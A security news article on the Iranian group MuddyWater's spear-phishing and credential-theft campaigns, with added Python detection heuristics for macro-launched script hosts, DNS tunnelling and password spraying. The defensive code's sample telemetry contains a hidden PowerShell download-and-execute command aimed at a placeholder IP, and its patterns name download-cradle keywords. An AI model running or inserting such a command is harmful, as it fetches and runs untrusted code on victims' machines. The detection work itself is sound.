Iranian Cyberspies Focus on Long-Running Operations

The Iranian cyber-espionage group referred to as MuddyWater continues to focus on long-running operations even after a U.S. airstrike killed General Qassem Soleimani on January 2.

Soleimani was the leader of Quds Force, an elite unit of the Iranian Revolutionary Guards, and his death resulted in escalated tensions between the United States and Iran, yet there have been no reports of cyber-attacks launched in retaliation.

Cyber-retaliation remains possible, and even industrial systems could be at risk, but for now Iranian threat groups appear to be focused on their long-running cyber-espionage activity instead, Secureworks' security researchers say.

“Although there was ballistic missile bombardment of U.S. military personnel in Iraq […], no government-directed cyber retaliation has been observed as of this publication,” the security firm notes in a new report.

Looking into the activity associated with Iran-linked hackers, Secureworks observed that most operations commenced prior to the U.S. drone strike. The campaigns were conducted by MuddyWater, a threat group that is also referred to as COBALT ULSTER, Seedworm, TEMP.Zagros, and Static Kitten.

Active since at least 2017, the group has mainly targeted entities in the Middle East and the United States with spear-phishing attacks, and has evolved its toolset and tactics to evade detection.

Between mid-2019 and mid-January 2020, the threat actor launched numerous spear-phishing attacks on governmental organizations in Turkey, Jordan, and Iraq, and also targeted global intergovernmental organizations and unknown entities in Georgia and Azerbaijan.


In one attack, the hackers sent numerous spear-phishing emails carrying malicious attachments, with some emails containing a link to a compromised site.

One infection chain used Excel documents carrying a malicious VBScript macro that dropped a copy of the legitimate wscript.exe binary, established persistence, and eventually fetched a second-stage PowerShell script designed to download additional payloads from a hardcoded IP address.
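The chain above leaves a recognisable trail in endpoint telemetry: an Office process spawning a script host, a copy of wscript.exe running outside the Windows system directories, a Run-key value written by that script host, and a PowerShell download cradle whose URL is a bare IP address rather than a hostname. The following detection logic is an added example written for this page, not Secureworks' or the threat actor's code; the event records are constructed to mimic Sysmon process-creation (EventID 1) and registry-value (EventID 13) fields, and every path, SID and address in them is invented (203.0.113.5 is a documentation address).

```python
"""Detection heuristics for the Excel-macro -> wscript.exe -> PowerShell chain.

Added example, not code from the original report or from the malware. Field
names mimic Sysmon EventID 1 (process creation) and EventID 13 (registry value
set); all sample values are constructed for illustration.
"""
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
WSH_HOSTS = {"wscript.exe", "cscript.exe"}
# Only these directories legitimately hold the Windows Script Host binaries.
LEGIT_WSH_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# URL whose host part is a bare IPv4 literal rather than a name.
IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of triggered indicators for one event ([] if none)."""
    hits = []
    if event["EventID"] == 1:
        image = basename(event["Image"])
        parent = basename(event["ParentImage"])
        cmd = event.get("CommandLine", "")
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            hits.append(f"office_spawns_script_host:{parent}->{image}")
        if image in WSH_HOSTS and not event["Image"].lower().startswith(LEGIT_WSH_DIRS):
            hits.append("script_host_outside_system_dir")
        url = IP_URL.search(cmd)
        if url and DOWNLOAD_CRADLE.search(cmd):
            hits.append(f"download_cradle_to_ip_literal:{url.group(1)}")
    elif event["EventID"] == 13:
        if RUN_KEY.search(event["TargetObject"]) and basename(event["Image"]) in SCRIPT_HOSTS:
            hits.append("run_key_persistence_by_script_host")
    return hits


def scan(events):
    """Return (index, indicators) for every event that triggered something."""
    findings = []
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            findings.append((i, hits))
    return findings


# Constructed sample telemetry (not from a real host).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"},
    {"EventID": 1, "Image": "C:\\Users\\alice\\AppData\\Roaming\\wscript.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "CommandLine": "\"C:\\Users\\alice\\AppData\\Roaming\\wscript.exe\" //B upd.vbs"},
    {"EventID": 13, "Image": "C:\\Users\\alice\\AppData\\Roaming\\wscript.exe",
     "TargetObject": "HKU\\S-1-5-21-1000-2000-3000-1001\\Software\\Microsoft\\Windows"
                     "\\CurrentVersion\\Run\\Updater"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Users\\alice\\AppData\\Roaming\\wscript.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.5/s')\""},
]

if __name__ == "__main__":
    for index, indicators in scan(SAMPLE_EVENTS):
        print(index, indicators)
```

The indicators are deliberately independent: the relocated wscript.exe fires even if the macro never reaches the download stage, and the IP-literal cradle fires regardless of the parent, so a single missed stage does not silence the whole chain.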

A second infection chain used Excel files with an obfuscated macro that dropped and executed a previously unobserved remote access Trojan (RAT). Dubbed ForeLord, the malware uses DNS tunneling for its communications.
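The page does not describe ForeLord's encoding or record types, so the detection below is generic: the per-domain signals a DNS tunnel tends to leave in resolver logs (many never-repeated query names under one domain, long high-entropy leftmost labels, and a preference for record types that carry bulk data). It is an added example, not Secureworks' analysis; the resolver log is constructed, the registered-domain split as "last two labels" is a simplification (a real deployment would use the Public Suffix List), and every threshold is illustrative.

```python
"""Per-domain DNS-tunnelling heuristics over a constructed resolver log.

Added example, not from the original report or the malware. Registered-domain
extraction is a two-label simplification; thresholds are illustrative.
"""
import math
from collections import Counter, defaultdict

# Constructed resolver log, one "<client> <qtype> <qname>" per line.
SAMPLE_LOG = """\
10.0.0.7 A www.example.com
10.0.0.7 A cdn.example.com
10.0.0.7 AAAA mail.example.com
10.0.0.9 TXT 3f0a9c1e7b2d5846f3a0c91e7b25d648.tun.example.net
10.0.0.9 TXT 8d2b6f4a0e9c1735d82bf64a9e0c7153.tun.example.net
10.0.0.9 TXT a1c3e5f7b9d02468c1a3f5e7d9b08642.tun.example.net
10.0.0.9 TXT 06f1e2d3c4b5a798f0e1d2c3b4a59687.tun.example.net
10.0.0.9 TXT 7e8d9c0b1a2f3456e7d8c9b0a1f23564.tun.example.net
"""

BULK_TYPES = {"TXT", "NULL"}   # record types commonly abused to carry payload data


def shannon_entropy(s):
    """Bits per character; 4.0 is the maximum for a string over 16 symbols."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_name(qname):
    """Return (registered_domain, prefix_labels). Assumption: last two labels form the domain."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), labels[:-2]


def profile(log_text):
    """Aggregate tunnel-relevant statistics per registered domain."""
    stats = defaultdict(lambda: {"queries": 0, "prefixes": set(), "bulk": 0,
                                 "max_prefix_len": 0, "entropy_sum": 0.0})
    for line in log_text.splitlines():
        _client, qtype, qname = line.split()
        domain, prefix_labels = split_name(qname)
        if not prefix_labels:
            continue                      # apex query: no label to hide data in
        prefix = ".".join(prefix_labels)
        s = stats[domain]
        s["queries"] += 1
        s["prefixes"].add(prefix)
        s["bulk"] += qtype.upper() in BULK_TYPES
        s["max_prefix_len"] = max(s["max_prefix_len"], len(prefix))
        # The leftmost label is where an encoded payload chunk normally sits.
        s["entropy_sum"] += shannon_entropy(prefix_labels[0])
    return stats


def suspicious_domains(stats, min_queries=5):
    """Domains showing at least three of the four tunnel indicators."""
    flagged = []
    for domain, s in sorted(stats.items()):
        if s["queries"] < min_queries:
            continue
        indicators = []
        if len(s["prefixes"]) / s["queries"] >= 0.9:
            indicators.append("unique_prefix_ratio")
        if s["entropy_sum"] / s["queries"] >= 3.5:
            indicators.append("high_prefix_entropy")
        if s["max_prefix_len"] >= 30:
            indicators.append("long_prefix")
        if s["bulk"] / s["queries"] >= 0.5:
            indicators.append("bulk_record_types")
        if len(indicators) >= 3:
            flagged.append((domain, indicators))
    return flagged


if __name__ == "__main__":
    for domain, why in suspicious_domains(profile(SAMPLE_LOG)):
        print(domain, why)
```

Requiring three of four indicators keeps CDNs and anti-spam services (which also generate many unique, fairly long names) from tripping on a single signal; the min_queries floor stops a one-off lookup from being scored at all.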

The threat actor then deployed several tools onto the compromised host to collect and test credentials and to create a reverse SSL tunnel for expanded access to the network: PasswordDumper, a Mimikatz variant named Caller.dll, and the open-source tools CredNinja, for credential testing, and Secure Socket Funneling (SSF), for TCP and UDP port forwarding.

Many of the attacks MuddyWater launched over the past couple of years started with credential collection via social engineering, phishing, password spraying, brute-force attacks, and exploitation of publicly accessible systems, the researchers say.
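Password spraying and brute forcing leave opposite shapes in failed-logon telemetry: a spray tries many accounts a few times each from one source to stay under lockout thresholds, while a brute-force attempt hammers one account. The sliding-window classifier below, an added example rather than Secureworks' detection content, separates the two. The records are constructed in the shape you would pull from Windows Security event 4625 or an identity-provider sign-in log (timestamp, source address, target account); the addresses and account names are invented and the thresholds are illustrative.

```python
"""Password spray vs. brute force over constructed failed-logon records.

Added example, not from the original report. Thresholds and all sample data
are illustrative.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def classify_source(rows, window, min_accounts, min_attempts):
    """rows: [(datetime, account)] for one source address."""
    rows = sorted(rows)
    start = 0
    max_distinct = 0        # most distinct accounts seen inside one window
    peak_per_account = 0    # most failures against a single account in one window
    for end in range(len(rows)):
        while rows[end][0] - rows[start][0] > window:
            start += 1
        counts = Counter(acct for _, acct in rows[start:end + 1])
        max_distinct = max(max_distinct, len(counts))
        peak_per_account = max(peak_per_account, max(counts.values()))
    verdicts = []
    # Spray: many accounts, each tried only a few times (stays under lockout).
    if max_distinct >= min_accounts and peak_per_account <= 3:
        verdicts.append("password_spray")
    # Brute force: one account hit repeatedly.
    if peak_per_account >= min_attempts:
        verdicts.append("brute_force")
    return verdicts or ["benign"]


def detect(events, window=timedelta(minutes=30), min_accounts=10, min_attempts=8):
    """events: [(iso_timestamp, source_ip, account)] -> {source_ip: verdicts}."""
    by_source = defaultdict(list)
    for ts, src, acct in events:
        by_source[src].append((datetime.fromisoformat(ts), acct))
    return {src: classify_source(rows, window, min_accounts, min_attempts)
            for src, rows in by_source.items()}


# Constructed failed-logon records (not real log data).
SAMPLE_4625 = (
    # one source, twelve different accounts, one attempt each, a minute apart
    [(f"2020-01-14T09:{m:02d}:15", "198.51.100.23", f"user{m:02d}") for m in range(12)]
    # one source, eight attempts against "admin" inside forty seconds
    + [(f"2020-01-14T09:03:{s:02d}", "10.0.0.5", "admin") for s in range(0, 40, 5)]
    # a single ordinary typo
    + [("2020-01-14T09:05:00", "10.0.0.12", "alice")]
)

if __name__ == "__main__":
    for source, verdict in detect(SAMPLE_4625).items():
        print(source, verdict)
```

Window size matters as much as the count thresholds: a slow spray spread over hours drops below min_accounts in a five-minute window, so a production rule should run the same logic at more than one window length. The same per-source sliding-window idea, applied to successful authentications across many hosts, is the natural way to spot dumped credentials being tested with a tool like CredNinja.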

“Although Iran has not launched a cyber-retaliation for Soleimani’s death as of this publication, CTU researchers acknowledge that planning and coordinating for a response takes time. Iran has destructive and disruptive capabilities that it has historically employed for retaliatory purposes against organizations. In some cases, these responses materialized several months after provocations toward Iran occurred. However, Iran’s cyberespionage operations continue,” Secureworks concludes.

Related: “MuddyWater” Cyberspies Update PowerShell Backdoor

Related: Targeted Phishing Campaign Leverages Death of Iranian General Qasem Suleimani

Related: Iran-Linked ZeroCleare Wiper Targets Energy, Industrial Sectors in Middle East

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
